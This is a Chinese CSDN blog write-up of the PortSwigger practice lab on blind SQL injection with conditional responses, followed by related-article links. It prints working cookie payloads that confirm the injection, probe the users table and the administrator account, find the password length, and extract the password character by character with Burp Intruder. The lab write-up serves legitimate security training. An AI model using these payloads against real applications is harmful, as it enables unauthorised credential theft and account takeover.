Lab: Blind SQL injection with conditional responses PRACTITIONER 带条件响应的SQL盲注靶场复盘

最新推荐文章于 2023-12-22 14:23:11 发布
最新推荐文章于 2023-12-22 14:23:11 发布
阅读量542 收藏
点赞数 1
分类专栏: 网络安全学习 文章标签: mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZripenYe/article/details/119771780
版权

靶场完成目标:

This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.

The results of the SQL query are not returned, and no error messages are displayed.But the application includes a “Welcome back” message in the page if the query returns any rows.

The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.

To solve the lab, log in as the administrator user.
综上所述,没有报错,但是如果合法就会出现welcome back的字样
靶场目标是使用administrator账户登录

开启演练

打开靶场并用burp抓包,发送到repeater
在这里插入图片描述
在这里插入图片描述
测试语句

  • ' and 1=1 --+是否会显示welcome
    在这里插入图片描述

  • ’and 1=2 --+是否不会返回错误
    在这里插入图片描述
    正如猜想的那样,这里有个盲注点

  • ' and (selcet 'a' from users limit 1)='a' --+ 这条语句确认是不是users这个数据表,它寻找’a’这一列,如果users存在,那么就会返回’a’这个字符串,因为SQL语句中,即使某列不存在,也会返回那一列的名字,加上limit是防止那一列真的存在返回了那一列的某个值
    在这里插入图片描述

  • ' and (select 'a' from users where username='administrator' limit 1)='a' --+ 用来确认是否有administrator这个用户:
    在这里插入图片描述

  • ' and (select 'a' from users where username='administrator' and length(password)>5)='a' --+ 来确定password的长度
    在这里插入图片描述
    但是我们需要手动确定password的长度,所以我们需要变更length的条件,最后发现,password的长度为20
    在这里插入图片描述

  • 暴力破解密码:知道密码长度后,我们就可以暴力破解了:使用语句:' and (select substring(password,1,1) from users where username='administrator')='a' --+ 通过这个语句,我们可以知道password的第一个字符是不是a,所以变量有两个:一个是substring的第二个参数,一个是最后面的字符。

  • 放入Intruder模式:选取两个变量:
    在这里插入图片描述

  • 第一个字典是1~20的数字,第二个字典是0~9、A~Z、a~z的内容:
    在这里插入图片描述
    在这里插入图片描述

  • 设置判断条件是回显 Welcome back
    在这里插入图片描述

  • 开始攻击(攻击过程有些慢,国外网站你懂的):
    根据内容,我们可以找到数字所对应的密码为
    在这里插入图片描述

  • 记下来输入密码即可:
    在这里插入图片描述

和传统的URL盲注不同的是,这里是在cookie字段中注入的,但是这个cookie或许就是被加密的用户名,所以利用这个的真与假,我们就能一步步判断我们的步骤,虽然不能一步到位

Zeker62
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sql盲注 解决_SQL 盲注漏洞
weixin_39943992的博客
12-19 1126
原文来自:PORTSWIGGER WEB SECURITY >> Web Security Academy>>SQL injection >>Blind SQL injection翻译完毕...本部分,我们将描述什么是 SQL 盲注漏洞,并解释发现和利用 SQL 盲注漏洞的多种技术。什么是 SQL 盲注?当应用程序容易收到 SQL 注入,但其 HTTP 响应不包...
BurpSuit官方实验室之SQL注入
tpaer的博客
11-13 5195
BurpSuit官方实验室靶场-SQL注入通关记录。
Lab: Blind SQL injection with conditional errors条件错误的盲注靶场复盘
Zeker62的博客
08-18 435
靶场要求: This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie. The results of the SQL query are not returned, and the application do
SQL 盲注
周无争的博客
09-26 297
本文翻译自:https://portswigger.net/web-security/sql-injection/blind 在这一部分,我们将描述什么是盲目的SQL注入,解释各种发现和利用盲目的SQL注入漏洞的技术。 什么是SQL盲注? 当应用程序易受SQL注入攻击,但其HTTP响应不包含相关SQL查询的结果或任何数据库错误的详细信息时,就会出现SQL盲注。 由于存在SQL盲注漏洞,许多技术(如联合注入)并不有效,因为它们依赖于能够在应用程序的响应中看到注入查询的结果。仍然有可能利用盲SQL注入来访问未经
portswigger labSQLI 盲注:利用conditional error
小雨的博客
08-17 306
sqli lab 盲注 portswigger SQL注入,安全测试,burp
MySQL Blind Sql Injection
weixin_30396699的博客
07-14 140
{==============================================================================} { [ Zeelock-2005 ] } {===================================...
Java 条件编译 Conditional Compilation
01-20
根据Java编译器的优化的机制,Java也能够提供条件编译。对于条件设为false的语句,编译器将不对条件覆盖的代码段生成字节码。  不仅可以用简单的boolean常量值来做条件编译,还可以用字符串常量及任何其他类型的...
Learning SQL.rar_Sql queries_learning sql_objects
09-21
内容如下: 1.The history of the computerized database 2.SQL Data Statements--those used to create, manipulate, and retrieve data stored in your ...7.How conditional logic can be used in Data Statements
TensorFlow-Conditional-GAN:有条件的GAN
05-14
TensorFlow-Conditional-GAN (Conditional-GAN)条件生成对抗网络可以使用Vanilla GAN模型创建所需目标图像的模型有条件的GAN论文: : 有条件的GAN.py * loss function는 ...v2와 동일* dataset : MNIST有条件的GAN ...
Spring条件注解@Conditional示例详解
08-25
"Spring条件注解@Conditional示例详解" Spring框架中提供了一个强大的条件注解@Conditional,它允许开发者根据特定的条件来控制Bean的创建行为。@Conditional注解可以应用于类和方法上,需要传入一个实现了...
django-conditional-aggregates:Django聚合可有条件运行的函数(即生成SQL`CASE`语句)
05-22
Django条件聚集 (由于旧版SQLCompiler类的限制,无法使用Django 1.4和1.5) 注意:由于内置支持,因此不需要Django 1.8上的该模块: : 有时,您需要一些条件逻辑来确定要在聚合函数中“聚合”哪些相关行。 在...
【PortSwiggerのWeb Security Academy靶场SQL Injection系列 9th
javagty6778的博客
01-05 79
Lab: Blind SQL injection with conditional responsesUrl: portswigger.net/web-securit…在着 cookies的后续访问网页时会找到出现的 标志 ==> 无法回显 ==> 采用盲注的方式 0x03 爆破表名 0x04 爆破字段名 无法解决的痛点:函数无法使用(与此同时concat函数可以正常使用);没有无法select出结果(与此同时 无法select出结果)==> 导致的结果:没有办法一次性爆破出所有的select
【偷偷收藏】10个国外福利网站
热门推荐
风口IT猪的成长录
01-14 13万+
10个国外福利网站!偷偷收藏!4 个文件处理在线网站smallpdfilovepdfconvertiodocsmall3 个无版权图片在线网站pngimgpexelspixabay3 个图片工具在线网站tinifyezgif智图 4 个文件处理在线网站 smallpdf 1、smallpdf是一个在线PDF文件转换、编辑、阅读、加密、解密、签名、合并分割的免费网站。 中文地址:https://smallpdf.com/cn ilovepdf 2、ilovepdf同样是一个免费的PDF文件转换、编辑、压缩、
Portswigger sql注入
最新发布
arcuied
12-22 906
这里靶场指出 不要随意的测试 or 1=1 在update 和 delete下可能会增删数据。在union的第二个参数可以注出来 可以分两次读username 和 password。不知道是oracle还是SqlServer还是postgresql的语法。administrator登录 使用的Oracle数据库。需求: administrator登录。需求:获取Oracle数据的数据库版本。还要注意的是Oracle数据库的特性。需求:administrator登录。需求:返回包含null的值。
国内外你知道的设计网站!给你的设计找点灵感!
WHLin22的博客
04-20 4968
1、Dreamstime 网址:http://www.dreamstime.com/ 介绍:Dreamstime是一个低价格高质量的数码影像素材提供站点,所有图像都是由专业的摄影师提供,提供免费以及付费的图像集合,虽然不是很多,但其内容是相当专业的。需要注册下载。 2、Free Digital Photos 网址:http://www.freedigitalphotos.net/ 介绍:Free Digital Photos是一个提供图片免费下载的站点,这些图片可以用于网页设计、平面设计、印刷、报纸杂志等。
JAVA开发者最常去的20个英文网站
zhengpeijie的专栏
09-01 461
 JAVA开发者最常去的20个英文网站1.[http://www.javaalmanac.com] – Java开发者年鉴一书的在线版本. 要想快速查到某种Java技巧的用法及示例代码, 这是一个不错的去处.2.[http://www.onjava.com] – O’Reilly的Java网站. 每周都有新文章.3.[http://java.sun.com] – 官方的Java开发者网
90个外国英文网站强力推荐
liuwei662656的专栏
06-30 4752
90个外国英文网站强力推荐 一、大陆可访问的优秀英文信息源 1、英国《经济学家》 http://www.economist.com 2、美联社 http://wire.ap.org/GoToAP.cgi 3、英国BBC http://news.bbc.co.uk 4、《纽约时报》 http://www.nytimes.com 5、普利策新闻奖1995年到2001年全部获奖作品 http://www
(一)SQL注入实例
weixin_43047908的博客
04-09 2067
SQL injection UNION attack, determining the number of columns returned by the query GET /filter?category=Gifts HTTP/1.1 Host: ac691f351f548a1780ec009d00da0072.web-security-academy.net Connection: close Cache-Control: max-age=0 sec-ch-ua: "Google Chrome";v=
1 SQL injection
(∪.∪ )...zzz的博客
04-18 923
SQL injection 目录SQL injection一、What二、Influence三、SQL injection examples1.retrieving hidden data检索隐藏数据lab 12.subverting application logic颠覆应用程序逻辑lab2 SQL injection vulnerability allowing login bypass3.UNION attacks4. Examining the database检查数据库5.Blind SQL
devconnect.cpp:86:2: error: unterminated conditional directive
06-10
这个错误通常出现在你的代码中的预处理器指令中,而不是在实际的代码中。它意味着一个条件指令没有正确关闭,也就是说,`#if`、`#ifdef` 或 `#ifndef` 之后没有对应的 `#endif` 指令。 请检查你的代码中是否有以下情况: 1. 一个条件指令的条件表达式没有正确结束,例如缺少括号、引号等。 2. 一个条件指令没有正确嵌套,例如一个 `#if` 指令没有对应的 `#endif` 指令。 3. 一个条件指令没有正确关闭,例如缺少 `#endif` 指令。 请检查你的代码中的预处理器指令是否具有正确的语法和符号,并确保每个条件指令都正确关闭。如果你仍然无法解决问题,请提供更多的代码和错误信息以便我更好地帮助你。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值